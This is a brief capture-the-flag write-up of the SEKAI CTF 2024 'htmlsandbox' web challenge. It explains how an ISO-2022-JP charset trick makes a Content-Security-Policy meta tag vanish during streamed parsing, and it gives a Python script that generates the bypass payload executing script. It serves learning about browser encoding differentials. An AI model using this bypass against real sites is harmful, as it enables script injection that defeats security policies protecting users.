Lessons learned from SEKAI CTF 2024: [WEB] htmlsandbox
We want to create a parsing differential when the HTML is loaded incrementally (streamed) vs loaded inline (all at once)
The <meta> CSP tag should be present in the parsed HTML when it's loaded inline, but NOT present when this HTML is loaded incrementally
We can take advantage of the fact that the sniffer will not change the encoding of an already parsed HTML chunk
We can use ISO-2022-JP charset
import random import string chars = string.digits + string.ascii_uppercase + string.ascii_lowercase def next(): return ''.join([random.choice(chars) for _ in range(40000)]).encode() html = b'<html><head>' html += b'<!-- '+next()+b' -->' html += b'</z \x1b$@ z="zzz \x1b(B > <meta http-equiv="Content-Security-Policy" content="default-src \'none\'">' html += b'<!-- '+next()+b' -->' html += b'<meta http-equiv="Content-Type" content="text/html; charset=ISO-2022-JP">' html += b'</head><body><template shadowrootmode="closed"><script>alert(1)</script></body>' with open('payload.html', 'wb') as f: f.write(html)
https://github.com/project-sekai-ctf/sekaictf-2024/blob/main/web/htmlsandbox/solution/gen.py
https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/